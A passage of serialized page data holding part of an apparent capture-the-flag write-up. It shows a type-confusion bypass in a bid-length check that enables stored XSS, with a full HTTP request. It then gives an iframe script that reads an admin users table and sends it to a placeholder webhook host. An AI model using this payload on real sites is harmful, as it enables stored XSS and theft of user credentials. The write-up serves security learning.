400\n",{"type":33,"tag":128,"props":6990,"children":6991},{"class":130,"line":1051},[6992,6997,7001,7005,7009,7013,7017,7021,7025,7029,7034,7038,7042,7047,7051,7055,7059,7063,7067,7071,7075,7080,7084,7089,7093],{"type":33,"tag":128,"props":6993,"children":6994},{"style":300},[6995],{"type":38,"value":6996},"                  
:",{"type":33,"tag":128,"props":6998,"children":6999},{"style":312},[7000],{"type":38,"value":2852},{"type":33,"tag":128,"props":7002,"children":7003},{"style":306},[7004],{"type":38,"value":6864},{"type":33,"tag":128,"props":7006,"children":7007},{"style":312},[7008],{"type":38,"value":215},{"type":33,"tag":128,"props":7010,"children":7011},{"style":306},[7012],{"type":38,"value":6948},{"type":33,"tag":128,"props":7014,"children":7015},{"style":312},[7016],{"type":38,"value":215},{"type":33,"tag":128,"props":7018,"children":7019},{"style":135},[7020],{"type":38,"value":6957},{"type":33,"tag":128,"props":7022,"children":7023},{"style":312},[7024],{"type":38,"value":5566},{"type":33,"tag":128,"props":7026,"children":7027},{"style":676},[7028],{"type":38,"value":6040},{"type":33,"tag":128,"props":7030,"children":7031},{"style":140},[7032],{"type":38,"value":7033},"not found",{"type":33,"tag":128,"props":7035,"children":7036},{"style":676},[7037],{"type":38,"value":6040},{"type":33,"tag":128,"props":7039,"children":7040},{"style":312},[7041],{"type":38,"value":2966},{"type":33,"tag":128,"props":7043,"children":7044},{"style":300},[7045],{"type":38,"value":7046}," 
||",{"type":33,"tag":128,"props":7048,"children":7049},{"style":306},[7050],{"type":38,"value":6915},{"type":33,"tag":128,"props":7052,"children":7053},{"style":312},[7054],{"type":38,"value":215},{"type":33,"tag":128,"props":7056,"children":7057},{"style":306},[7058],{"type":38,"value":6948},{"type":33,"tag":128,"props":7060,"children":7061},{"style":312},[7062],{"type":38,"value":215},{"type":33,"tag":128,"props":7064,"children":7065},{"style":135},[7066],{"type":38,"value":6957},{"type":33,"tag":128,"props":7068,"children":7069},{"style":312},[7070],{"type":38,"value":5566},{"type":33,"tag":128,"props":7072,"children":7073},{"style":676},[7074],{"type":38,"value":6040},{"type":33,"tag":128,"props":7076,"children":7077},{"style":140},[7078],{"type":38,"value":7079},"closed",{"type":33,"tag":128,"props":7081,"children":7082},{"style":676},[7083],{"type":38,"value":6040},{"type":33,"tag":128,"props":7085,"children":7086},{"style":312},[7087],{"type":38,"value":7088},"))",{"type":33,"tag":128,"props":7090,"children":7091},{"style":300},[7092],{"type":38,"value":6983},{"type":33,"tag":128,"props":7094,"children":7095},{"style":523},[7096],{"type":38,"value":7097}," 404\n",{"type":33,"tag":128,"props":7099,"children":7100},{"class":130,"line":1063},[7101,7105,7110],{"type":33,"tag":128,"props":7102,"children":7103},{"style":300},[7104],{"type":38,"value":6996},{"type":33,"tag":128,"props":7106,"children":7107},{"style":523},[7108],{"type":38,"value":7109}," 
500",{"type":33,"tag":128,"props":7111,"children":7112},{"style":312},[7113],{"type":38,"value":5676},{"type":33,"tag":128,"props":7115,"children":7116},{"class":130,"line":1076},[7117,7121,7125,7129,7133,7137,7141,7145,7149,7153,7157,7161,7165,7169,7173,7177,7181,7185,7189,7193,7197,7202,7206],{"type":33,"tag":128,"props":7118,"children":7119},{"style":1576},[7120],{"type":38,"value":6810},{"type":33,"tag":128,"props":7122,"children":7123},{"style":306},[7124],{"type":38,"value":5616},{"type":33,"tag":128,"props":7126,"children":7127},{"style":312},[7128],{"type":38,"value":215},{"type":33,"tag":128,"props":7130,"children":7131},{"style":135},[7132],{"type":38,"value":6686},{"type":33,"tag":128,"props":7134,"children":7135},{"style":312},[7136],{"type":38,"value":5566},{"type":33,"tag":128,"props":7138,"children":7139},{"style":306},[7140],{"type":38,"value":6686},{"type":33,"tag":128,"props":7142,"children":7143},{"style":312},[7144],{"type":38,"value":6700},{"type":33,"tag":128,"props":7146,"children":7147},{"style":135},[7148],{"type":38,"value":633},{"type":33,"tag":128,"props":7150,"children":7151},{"style":312},[7152],{"type":38,"value":5836},{"type":33,"tag":128,"props":7154,"children":7155},{"style":437},[7156],{"type":38,"value":5841},{"type":33,"tag":128,"props":7158,"children":7159},{"style":312},[7160],{"type":38,"value":284},{"type":33,"tag":128,"props":7162,"children":7163},{"style":1576},[7164],{"type":38,"value":6721},{"type":33,"tag":128,"props":7166,"children":7167},{"style":312},[7168],{"type":38,"value":5584},{"type":33,"tag":128,"props":7170,"children":7171},{"style":437},[7172],{"type":38,"value":6730},{"type":33,"tag":128,"props":7174,"children":7175},{"style":312},[7176],{"type":38,"value":284},{"type":33,"tag":128,"props":7178,"children":7179},{"style":306},[7180],{"type":38,"value":6915},{"type":33,"tag":128,"props":7182,"children":7183},{"style":312},[7184],{"type":38,"value":215},{"type":33,"tag":128,"props":7186,"children":7187},{"style
":306},[7188],{"type":38,"value":6948},{"type":33,"tag":128,"props":7190,"children":7191},{"style":300},[7192],{"type":38,"value":7046},{"type":33,"tag":128,"props":7194,"children":7195},{"style":676},[7196],{"type":38,"value":6739},{"type":33,"tag":128,"props":7198,"children":7199},{"style":140},[7200],{"type":38,"value":7201},"Internal server error.",{"type":33,"tag":128,"props":7203,"children":7204},{"style":676},[7205],{"type":38,"value":6040},{"type":33,"tag":128,"props":7207,"children":7208},{"style":312},[7209],{"type":38,"value":5863},{"type":33,"tag":128,"props":7211,"children":7212},{"class":130,"line":1089},[7213],{"type":33,"tag":128,"props":7214,"children":7215},{"style":312},[7216],{"type":38,"value":845},{"type":33,"tag":128,"props":7218,"children":7219},{"class":130,"line":1101},[7220],{"type":33,"tag":128,"props":7221,"children":7222},{"style":312},[7223],{"type":38,"value":5902},{"type":33,"tag":47,"props":7225,"children":7226},{},[7227],{"type":38,"value":7228},"However, we can see in the code that no type checking is performed. 
It is therefore entirely possible to submit a JSON object instead of a string: the check reads the length property of bid straight from the parsed JSON body without verifying that bid is a string, so an object that declares its own numeric length below 10 passes the check while the real payload sits in any other property:",{"type":33,"tag":114,"props":7230,"children":7231},{"lang":633},[7232],{"type":33,"tag":119,"props":7233,"children":7235},{"className":637,"code":7234,"language":633,"meta":8,"style":8},"{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror=alert(1)>\"}}\n",[7236],{"type":33,"tag":105,"props":7237,"children":7238},{"__ignoreMap":8},[7239],{"type":33,"tag":128,"props":7240,"children":7241},{"class":130,"line":131},[7242,7247,7251,7255,7259,7264,7268,7272,7276,7280,7285,7289,7293,7298,7302,7306,7310,7315,7319],{"type":33,"tag":128,"props":7243,"children":7244},{"style":312},[7245],{"type":38,"value":7246},"{",{"type":33,"tag":128,"props":7248,"children":7249},{"style":656},[7250],{"type":38,"value":669},{"type":33,"tag":128,"props":7252,"children":7253},{"style":437},[7254],{"type":38,"value":6634},{"type":33,"tag":128,"props":7256,"children":7257},{"style":656},[7258],{"type":38,"value":669},{"type":33,"tag":128,"props":7260,"children":7261},{"style":312},[7262],{"type":38,"value":7263},":{",{"type":33,"tag":128,"props":7265,"children":7266},{"style":656},[7267],{"type":38,"value":669},{"type":33,"tag":128,"props":7269,"children":7270},{"style":437},[7271],{"type":38,"value":6643},{"type":33,"tag":128,"props":7273,"children":7274},{"style":656},[7275],{"type":38,"value":669},{"type":33,"tag":128,"props":7277,"children":7278},{"style":312},[7279],{"type":38,"value":284},{"type":33,"tag":128,"props":7281,"children":7282},{"style":523},[7283],{"type":38,"value":7284},"1",{"type":33,"tag":128,"props":7286,"children":7287},{"style":312},[7288],{"type":38,"value":5584},{"type":33,"tag":128,"props":7290,"children":7291},{"style":656},[7292],{"type":38,"value":669},{"type":33,"tag":128,"props":7294,"children":7295},{"style":437},[7296],{"type":38,"value":7297},"o",{"type":33,"tag":128,"props":7299,"children":7300},{"style":656},[7301],{"type":38,"value":669},
{"type":33,"tag":128,"props":7303,"children":7304},{"style":312},[7305],{"type":38,"value":284},{"type":33,"tag":128,"props":7307,"children":7308},{"style":676},[7309],{"type":38,"value":669},{"type":33,"tag":128,"props":7311,"children":7312},{"style":140},[7313],{"type":38,"value":7314},"a'>\u003Cimg src=x onerror=alert(1)>",{"type":33,"tag":128,"props":7316,"children":7317},{"style":676},[7318],{"type":38,"value":669},{"type":33,"tag":128,"props":7320,"children":7321},{"style":312},[7322],{"type":38,"value":7323},"}}\n",{"type":33,"tag":47,"props":7325,"children":7326},{},[7327,7329,7334],{"type":38,"value":7328},"Additionally, in the template part that contains the injection, the dump keyword will convert the object we provide to a string which will then be passed to safe. This means that we can inject a JSON object with a length of 1 and an XSS payload in the ",{"type":33,"tag":105,"props":7330,"children":7332},{"className":7331},[],[7333],{"type":38,"value":7297},{"type":38,"value":7335}," field.",{"type":33,"tag":114,"props":7337,"children":7338},{"lang":1561},[7339],{"type":33,"tag":119,"props":7340,"children":7342},{"className":1565,"code":7341,"language":1561,"meta":8,"style":8},"POST /api/auctions/1/bids HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 58\nCookie: connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n\n{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror=alert(1)>\"}}\n",[7343],{"type":33,"tag":105,"props":7344,"children":7345},{"__ignoreMap":8},[7346,7373,7385,7396,7408,7421,7428],{"type":33,"tag":128,"props":7347,"children":7348},{"class":130,"line":131},[7349,7353,7358,7363,7368],{"type":33,"tag":128,"props":7350,"children":7351},{"style":1576},[7352],{"type":38,"value":1406},{"type":33,"tag":128,"props":7354,"children":7355},{"style":323},[7356],{"type":38,"value":7357}," /api/auctions/1/bids 
",{"type":33,"tag":128,"props":7359,"children":7360},{"style":1576},[7361],{"type":38,"value":7362},"HTTP",{"type":33,"tag":128,"props":7364,"children":7365},{"style":323},[7366],{"type":38,"value":7367},"/",{"type":33,"tag":128,"props":7369,"children":7370},{"style":523},[7371],{"type":38,"value":7372},"1.1\n",{"type":33,"tag":128,"props":7374,"children":7375},{"class":130,"line":362},[7376,7380],{"type":33,"tag":128,"props":7377,"children":7378},{"style":1576},[7379],{"type":38,"value":1591},{"type":33,"tag":128,"props":7381,"children":7382},{"style":140},[7383],{"type":38,"value":7384}," localhost:1337\n",{"type":33,"tag":128,"props":7386,"children":7387},{"class":130,"line":403},[7388,7392],{"type":33,"tag":128,"props":7389,"children":7390},{"style":1576},[7391],{"type":38,"value":1630},{"type":33,"tag":128,"props":7393,"children":7394},{"style":140},[7395],{"type":38,"value":1635},{"type":33,"tag":128,"props":7397,"children":7398},{"class":130,"line":739},[7399,7403],{"type":33,"tag":128,"props":7400,"children":7401},{"style":1576},[7402],{"type":38,"value":1643},{"type":33,"tag":128,"props":7404,"children":7405},{"style":140},[7406],{"type":38,"value":7407}," 58\n",{"type":33,"tag":128,"props":7409,"children":7410},{"class":130,"line":765},[7411,7416],{"type":33,"tag":128,"props":7412,"children":7413},{"style":1576},[7414],{"type":38,"value":7415},"Cookie:",{"type":33,"tag":128,"props":7417,"children":7418},{"style":140},[7419],{"type":38,"value":7420}," 
connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n",{"type":33,"tag":128,"props":7422,"children":7423},{"class":130,"line":804},[7424],{"type":33,"tag":128,"props":7425,"children":7426},{"emptyLinePlaceholder":896},[7427],{"type":38,"value":899},{"type":33,"tag":128,"props":7429,"children":7430},{"class":130,"line":839},[7431,7435,7439,7443,7447,7451,7455,7459,7463,7467,7471,7475,7479,7483,7487,7491,7495,7499,7503],{"type":33,"tag":128,"props":7432,"children":7433},{"style":312},[7434],{"type":38,"value":7246},{"type":33,"tag":128,"props":7436,"children":7437},{"style":656},[7438],{"type":38,"value":669},{"type":33,"tag":128,"props":7440,"children":7441},{"style":437},[7442],{"type":38,"value":6634},{"type":33,"tag":128,"props":7444,"children":7445},{"style":656},[7446],{"type":38,"value":669},{"type":33,"tag":128,"props":7448,"children":7449},{"style":312},[7450],{"type":38,"value":7263},{"type":33,"tag":128,"props":7452,"children":7453},{"style":656},[7454],{"type":38,"value":669},{"type":33,"tag":128,"props":7456,"children":7457},{"style":437},[7458],{"type":38,"value":6643},{"type":33,"tag":128,"props":7460,"children":7461},{"style":656},[7462],{"type":38,"value":669},{"type":33,"tag":128,"props":7464,"children":7465},{"style":312},[7466],{"type":38,"value":284},{"type":33,"tag":128,"props":7468,"children":7469},{"style":523},[7470],{"type":38,"value":7284},{"type":33,"tag":128,"props":7472,"children":7473},{"style":312},[7474],{"type":38,"value":5584},{"type":33,"tag":128,"props":7476,"children":7477},{"style":656},[7478],{"type":38,"value":669},{"type":33,"tag":128,"props":7480,"children":7481},{"style":437},[7482],{"type":38,"value":7297},{"type":33,"tag":128,"props":7484,"children":7485},{"style":656},[7486],{"type":38,"value":669},{"type":33,"tag":128,"props":7488,"children":7489},{"style":312},[7490],{"type":38,"value":284},{"type":33,"tag":128,"props":7492,"children":7493},{"style":676},[7494],{"type":38,"valu
e":669},{"type":33,"tag":128,"props":7496,"children":7497},{"style":140},[7498],{"type":38,"value":7314},{"type":33,"tag":128,"props":7500,"children":7501},{"style":676},[7502],{"type":38,"value":669},{"type":33,"tag":128,"props":7504,"children":7505},{"style":312},[7506],{"type":38,"value":7323},{"type":33,"tag":47,"props":7508,"children":7509},{},[7510],{"type":38,"value":7511},"After sending the data, if we go to the auction/1 page, we can see that our XSS is successfully triggered:",{"type":33,"tag":75,"props":7513,"children":7515},{"imgSrc":7514},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103381/writeups/aurors-archive/xss_alert.webp",[],{"type":33,"tag":47,"props":7517,"children":7518},{},[7519],{"type":38,"value":7520},"From now on, the path is to retrieve the admin password, so we will test our XSS payload on the admin area to better calibrate our attack and be able to send a functional payload to the admin",{"type":33,"tag":47,"props":7522,"children":7523},{},[7524],{"type":38,"value":7525},"I tested several approaches, notably with fetches but none of them worked on my end. 
What seemed the simplest at first glance was to work with an iframe since our XSS is on the same origin as the page that displays the user table passwords, we can interact with the iframe however we want.",{"type":33,"tag":47,"props":7527,"children":7528},{},[7529],{"type":38,"value":7530},"We will therefore create an iframe that will render the /admin page:",{"type":33,"tag":114,"props":7532,"children":7533},{"lang":5526},[7534],{"type":33,"tag":119,"props":7535,"children":7537},{"className":5530,"code":7536,"language":5526,"meta":8,"style":8},"let iframe = document.createElement(\"iframe\");\niframe.src = `/admin`;\niframe.width = 800;\niframe.height = 600;\ndocument.body.appendChild(iframe);\n",[7538],{"type":33,"tag":105,"props":7539,"children":7540},{"__ignoreMap":8},[7541,7593,7630,7659,7688],{"type":33,"tag":128,"props":7542,"children":7543},{"class":130,"line":131},[7544,7549,7554,7558,7563,7567,7572,7576,7580,7585,7589],{"type":33,"tag":128,"props":7545,"children":7546},{"style":300},[7547],{"type":38,"value":7548},"let",{"type":33,"tag":128,"props":7550,"children":7551},{"style":306},[7552],{"type":38,"value":7553}," iframe",{"type":33,"tag":128,"props":7555,"children":7556},{"style":312},[7557],{"type":38,"value":5657},{"type":33,"tag":128,"props":7559,"children":7560},{"style":306},[7561],{"type":38,"value":7562}," 
document",{"type":33,"tag":128,"props":7564,"children":7565},{"style":312},[7566],{"type":38,"value":215},{"type":33,"tag":128,"props":7568,"children":7569},{"style":135},[7570],{"type":38,"value":7571},"createElement",{"type":33,"tag":128,"props":7573,"children":7574},{"style":312},[7575],{"type":38,"value":5566},{"type":33,"tag":128,"props":7577,"children":7578},{"style":676},[7579],{"type":38,"value":669},{"type":33,"tag":128,"props":7581,"children":7582},{"style":140},[7583],{"type":38,"value":7584},"iframe",{"type":33,"tag":128,"props":7586,"children":7587},{"style":676},[7588],{"type":38,"value":669},{"type":33,"tag":128,"props":7590,"children":7591},{"style":312},[7592],{"type":38,"value":5815},{"type":33,"tag":128,"props":7594,"children":7595},{"class":130,"line":362},[7596,7600,7604,7609,7613,7617,7622,7626],{"type":33,"tag":128,"props":7597,"children":7598},{"style":306},[7599],{"type":38,"value":7584},{"type":33,"tag":128,"props":7601,"children":7602},{"style":312},[7603],{"type":38,"value":215},{"type":33,"tag":128,"props":7605,"children":7606},{"style":306},[7607],{"type":38,"value":7608},"src",{"type":33,"tag":128,"props":7610,"children":7611},{"style":312},[7612],{"type":38,"value":5657},{"type":33,"tag":128,"props":7614,"children":7615},{"style":676},[7616],{"type":38,"value":5710},{"type":33,"tag":128,"props":7618,"children":7619},{"style":140},[7620],{"type":38,"value":7621},"/admin",{"type":33,"tag":128,"props":7623,"children":7624},{"style":676},[7625],{"type":38,"value":5739},{"type":33,"tag":128,"props":7627,"children":7628},{"style":312},[7629],{"type":38,"value":5676},{"type":33,"tag":128,"props":7631,"children":7632},{"class":130,"line":403},[7633,7637,7641,7646,7650,7655],{"type":33,"tag":128,"props":7634,"children":7635},{"style":306},[7636],{"type":38,"value":7584},{"type":33,"tag":128,"props":7638,"children":7639},{"style":312},[7640],{"type":38,"value":215},{"type":33,"tag":128,"props":7642,"children":7643},{"style":306},[7644],{"type":
38,"value":7645},"width",{"type":33,"tag":128,"props":7647,"children":7648},{"style":312},[7649],{"type":38,"value":5657},{"type":33,"tag":128,"props":7651,"children":7652},{"style":523},[7653],{"type":38,"value":7654}," 800",{"type":33,"tag":128,"props":7656,"children":7657},{"style":312},[7658],{"type":38,"value":5676},{"type":33,"tag":128,"props":7660,"children":7661},{"class":130,"line":739},[7662,7666,7670,7675,7679,7684],{"type":33,"tag":128,"props":7663,"children":7664},{"style":306},[7665],{"type":38,"value":7584},{"type":33,"tag":128,"props":7667,"children":7668},{"style":312},[7669],{"type":38,"value":215},{"type":33,"tag":128,"props":7671,"children":7672},{"style":306},[7673],{"type":38,"value":7674},"height",{"type":33,"tag":128,"props":7676,"children":7677},{"style":312},[7678],{"type":38,"value":5657},{"type":33,"tag":128,"props":7680,"children":7681},{"style":523},[7682],{"type":38,"value":7683}," 600",{"type":33,"tag":128,"props":7685,"children":7686},{"style":312},[7687],{"type":38,"value":5676},{"type":33,"tag":128,"props":7689,"children":7690},{"class":130,"line":765},[7691,7696,7700,7704,7708,7713,7717,7721],{"type":33,"tag":128,"props":7692,"children":7693},{"style":306},[7694],{"type":38,"value":7695},"document",{"type":33,"tag":128,"props":7697,"children":7698},{"style":312},[7699],{"type":38,"value":215},{"type":33,"tag":128,"props":7701,"children":7702},{"style":306},[7703],{"type":38,"value":5671},{"type":33,"tag":128,"props":7705,"children":7706},{"style":312},[7707],{"type":38,"value":215},{"type":33,"tag":128,"props":7709,"children":7710},{"style":135},[7711],{"type":38,"value":7712},"appendChild",{"type":33,"tag":128,"props":7714,"children":7715},{"style":312},[7716],{"type":38,"value":5566},{"type":33,"tag":128,"props":7718,"children":7719},{"style":306},[7720],{"type":38,"value":7584},{"type":33,"tag":128,"props":7722,"children":7723},{"style":312},[7724],{"type":38,"value":5815},{"type":33,"tag":47,"props":7726,"children":7727},{},[7
728],{"type":38,"value":7729},"Result:",{"type":33,"tag":75,"props":7731,"children":7733},{"imgSrc":7732},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104159/writeups/aurors-archive/iframe_first_step.webp",[],{"type":33,"tag":47,"props":7735,"children":7736},{},[7737],{"type":38,"value":7738},"We will now click on the last element of the list which is the users table:",{"type":33,"tag":114,"props":7740,"children":7741},{"lang":5526},[7742],{"type":33,"tag":119,"props":7743,"children":7745},{"className":5530,"code":7744,"language":5526,"meta":8,"style":8},"document.querySelector('iframe').contentWindow.document.querySelectorAll('li').at(-1).click()\n",[7746],{"type":33,"tag":105,"props":7747,"children":7748},{"__ignoreMap":8},[7749],{"type":33,"tag":128,"props":7750,"children":7751},{"class":130,"line":131},[7752,7756,7760,7765,7769,7773,7777,7781,7785,7790,7794,7798,7802,7807,7811,7815,7819,7823,7827,7832,7836,7840,7844,7848,7853],{"type":33,"tag":128,"props":7753,"children":7754},{"style":306},[7755],{"type":38,"value":7695},{"type":33,"tag":128,"props":7757,"children":7758},{"style":312},[7759],{"type":38,"value":215},{"type":33,"tag":128,"props":7761,"children":7762},{"style":135},[7763],{"type":38,"value":7764},"querySelector",{"type":33,"tag":128,"props":7766,"children":7767},{"style":312},[7768],{"type":38,"value":5566},{"type":33,"tag":128,"props":7770,"children":7771},{"style":676},[7772],{"type":38,"value":6040},{"type":33,"tag":128,"props":7774,"children":7775},{"style":140},[7776],{"type":38,"value":7584},{"type":33,"tag":128,"props":7778,"children":7779},{"style":676},[7780],{"type":38,"value":6040},{"type":33,"tag":128,"props":7782,"children":7783},{"style":312},[7784],{"type":38,"value":6700},{"type":33,"tag":128,"props":7786,"children":7787},{"style":306},[7788],{"type":38,"value":7789},"contentWindow",{"type":33,"tag":128,"props":7791,"children":7792},{"style":312},[7793],{"type":38,"value":215},{"type":33,"tag":128,"props":7795,"children"
:7796},{"style":306},[7797],{"type":38,"value":7695},{"type":33,"tag":128,"props":7799,"children":7800},{"style":312},[7801],{"type":38,"value":215},{"type":33,"tag":128,"props":7803,"children":7804},{"style":135},[7805],{"type":38,"value":7806},"querySelectorAll",{"type":33,"tag":128,"props":7808,"children":7809},{"style":312},[7810],{"type":38,"value":5566},{"type":33,"tag":128,"props":7812,"children":7813},{"style":676},[7814],{"type":38,"value":6040},{"type":33,"tag":128,"props":7816,"children":7817},{"style":140},[7818],{"type":38,"value":243},{"type":33,"tag":128,"props":7820,"children":7821},{"style":676},[7822],{"type":38,"value":6040},{"type":33,"tag":128,"props":7824,"children":7825},{"style":312},[7826],{"type":38,"value":6700},{"type":33,"tag":128,"props":7828,"children":7829},{"style":135},[7830],{"type":38,"value":7831},"at",{"type":33,"tag":128,"props":7833,"children":7834},{"style":312},[7835],{"type":38,"value":5566},{"type":33,"tag":128,"props":7837,"children":7838},{"style":300},[7839],{"type":38,"value":907},{"type":33,"tag":128,"props":7841,"children":7842},{"style":523},[7843],{"type":38,"value":7284},{"type":33,"tag":128,"props":7845,"children":7846},{"style":312},[7847],{"type":38,"value":6700},{"type":33,"tag":128,"props":7849,"children":7850},{"style":135},[7851],{"type":38,"value":7852},"click",{"type":33,"tag":128,"props":7854,"children":7855},{"style":312},[7856],{"type":38,"value":7857},"()\n",{"type":33,"tag":47,"props":7859,"children":7860},{},[7861],{"type":38,"value":7729},{"type":33,"tag":75,"props":7863,"children":7865},{"imgSrc":7864},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104209/writeups/aurors-archive/display_user_table.webp",[],{"type":33,"tag":47,"props":7867,"children":7868},{},[7869],{"type":38,"value":7870},"We can now retrieve the table with the following 
line:",{"type":33,"tag":114,"props":7872,"children":7873},{"lang":5526},[7874],{"type":33,"tag":119,"props":7875,"children":7877},{"className":5530,"code":7876,"language":5526,"meta":8,"style":8},">> document.querySelector('iframe').contentWindow.document.body.querySelector('table').innerHTML\n\"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>\" \n",[7878],{"type":33,"tag":105,"props":7879,"children":7880},{"__ignoreMap":8},[7881,7975],{"type":33,"tag":128,"props":7882,"children":7883},{"class":130,"line":131},[7884,7889,7893,7897,7901,7905,7909,7913,7917,7921,7925,7929,7933,7937,7941,7945,7949,7953,7957,7962,7966,7970],{"type":33,"tag":128,"props":7885,"children":7886},{"style":300},[7887],{"type":38,"value":7888},">>",{"type":33,"tag":128,"props":7890,"children":7891},{"style":306},[7892],{"type":38,"value":7562},{"type":33,"tag":128,"props":7894,"children":7895},{"style":312},[7896],{"type":38,"value":215},{"type":33,"tag":128,"props":7898,"children":7899},{"style":135},[7900],{"type":38,"value":7764},{"type":33,"tag":128,"props":7902,"children":7903},{"style":312},[7904],{"type":38,"value":5566},{"type":33,"tag":128,"props":7906,"children":7907},{"style":676},[7908],{"type":38,"value":6040},{"type":33,"tag":128,"props":7910,"children":7911},{"style":140},[7912],{"type":38,"value":7584},{"type":33,"tag":128,"props":7914,"children":7915},{"style":676},[7916],{"type":38,"value":6040},{"type":33,"tag":128,"props":7918,"children":7919},{"style":312},[7920],{"type":38,"value":6700},{"type":33,"tag":128,"props":7922,"children":7923},{"style":306},[7924],{"type":38,"value":7789},{"type":33,"tag":128,"props":7926,"children":7927},{"style":312},[7928],{"type":38,"value":215},{"type":33,"tag":128,"props":7930,"children":7931},{"style":306},[7932],{"type":38,"value":7695},{"type":33,"tag":128,
"props":7934,"children":7935},{"style":312},[7936],{"type":38,"value":215},{"type":33,"tag":128,"props":7938,"children":7939},{"style":306},[7940],{"type":38,"value":5671},{"type":33,"tag":128,"props":7942,"children":7943},{"style":312},[7944],{"type":38,"value":215},{"type":33,"tag":128,"props":7946,"children":7947},{"style":135},[7948],{"type":38,"value":7764},{"type":33,"tag":128,"props":7950,"children":7951},{"style":312},[7952],{"type":38,"value":5566},{"type":33,"tag":128,"props":7954,"children":7955},{"style":676},[7956],{"type":38,"value":6040},{"type":33,"tag":128,"props":7958,"children":7959},{"style":140},[7960],{"type":38,"value":7961},"table",{"type":33,"tag":128,"props":7963,"children":7964},{"style":676},[7965],{"type":38,"value":6040},{"type":33,"tag":128,"props":7967,"children":7968},{"style":312},[7969],{"type":38,"value":6700},{"type":33,"tag":128,"props":7971,"children":7972},{"style":306},[7973],{"type":38,"value":7974},"innerHTML\n",{"type":33,"tag":128,"props":7976,"children":7977},{"class":130,"line":362},[7978,7982,7987],{"type":33,"tag":128,"props":7979,"children":7980},{"style":676},[7981],{"type":38,"value":669},{"type":33,"tag":128,"props":7983,"children":7984},{"style":140},[7985],{"type":38,"value":7986},"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>",{"type":33,"tag":128,"props":7988,"children":7989},{"style":676},[7990],{"type":38,"value":836},{"type":33,"tag":47,"props":7992,"children":7993},{},[7994],{"type":38,"value":7995},"After that, we can send it to our webhook. 
Below is the final payload - timeouts have been added to allow time for the data to be displayed:",{"type":33,"tag":114,"props":7997,"children":7998},{"lang":5526},[7999],{"type":33,"tag":119,"props":8000,"children":8002},{"className":5530,"code":8001,"language":5526,"meta":8,"style":8},"let iframe = document.createElement(\"iframe\");\niframe.src = `/admin`;\ndocument.body.appendChild(iframe);\nsetTimeout(() => {\n  document.querySelector('iframe').contentWindow.document.querySelectorAll('li')[3].click()\n  setTimeout(() => {\n    window.location = '//\u003CWEBHOOK>/?userstable=' + btoa(document.querySelector('iframe').contentWindow.document.body.querySelector('table').innerHTML)\n  }, 1000);\n}, 1000);\n",[8003],{"type":33,"tag":105,"props":8004,"children":8005},{"__ignoreMap":8},[8006,8053,8088,8123,8144,8239,8259,8396,8413],{"type":33,"tag":128,"props":8007,"children":8008},{"class":130,"line":131},[8009,8013,8017,8021,8025,8029,8033,8037,8041,8045,8049],{"type":33,"tag":128,"props":8010,"children":8011},{"style":300},[8012],{"type":38,"value":7548},{"type":33,"tag":128,"props":8014,"children":8015},{"style":306},[8016],{"type":38,"value":7553},{"type":33,"tag":128,"props":8018,"children":8019},{"style":312},[8020],{"type":38,"value":5657},{"type":33,"tag":128,"props":8022,"children":8023},{"style":306},[8024],{"type":38,"value":7562},{"type":33,"tag":128,"props":8026,"children":8027},{"style":312},[8028],{"type":38,"value":215},{"type":33,"tag":128,"props":8030,"children":8031},{"style":135},[8032],{"type":38,"value":7571},{"type":33,"tag":128,"props":8034,"children":8035},{"style":312},[8036],{"type":38,"value":5566},{"type":33,"tag":128,"props":8038,"children":8039},{"style":676},[8040],{"type":38,"value":669},{"type":33,"tag":128,"props":8042,"children":8043},{"style":140},[8044],{"type":38,"value":7584},{"type":33,"tag":128,"props":8046,"children":8047},{"style":676},[8048],{"type":38,"value":669},{"type":33,"tag":128,"props":8050,"children":8051},{"style":
312},[8052],{"type":38,"value":5815},{"type":33,"tag":128,"props":8054,"children":8055},{"class":130,"line":362},[8056,8060,8064,8068,8072,8076,8080,8084],{"type":33,"tag":128,"props":8057,"children":8058},{"style":306},[8059],{"type":38,"value":7584},{"type":33,"tag":128,"props":8061,"children":8062},{"style":312},[8063],{"type":38,"value":215},{"type":33,"tag":128,"props":8065,"children":8066},{"style":306},[8067],{"type":38,"value":7608},{"type":33,"tag":128,"props":8069,"children":8070},{"style":312},[8071],{"type":38,"value":5657},{"type":33,"tag":128,"props":8073,"children":8074},{"style":676},[8075],{"type":38,"value":5710},{"type":33,"tag":128,"props":8077,"children":8078},{"style":140},[8079],{"type":38,"value":7621},{"type":33,"tag":128,"props":8081,"children":8082},{"style":676},[8083],{"type":38,"value":5739},{"type":33,"tag":128,"props":8085,"children":8086},{"style":312},[8087],{"type":38,"value":5676},{"type":33,"tag":128,"props":8089,"children":8090},{"class":130,"line":403},[8091,8095,8099,8103,8107,8111,8115,8119],{"type":33,"tag":128,"props":8092,"children":8093},{"style":306},[8094],{"type":38,"value":7695},{"type":33,"tag":128,"props":8096,"children":8097},{"style":312},[8098],{"type":38,"value":215},{"type":33,"tag":128,"props":8100,"children":8101},{"style":306},[8102],{"type":38,"value":5671},{"type":33,"tag":128,"props":8104,"children":8105},{"style":312},[8106],{"type":38,"value":215},{"type":33,"tag":128,"props":8108,"children":8109},{"style":135},[8110],{"type":38,"value":7712},{"type":33,"tag":128,"props":8112,"children":8113},{"style":312},[8114],{"type":38,"value":5566},{"type":33,"tag":128,"props":8116,"children":8117},{"style":3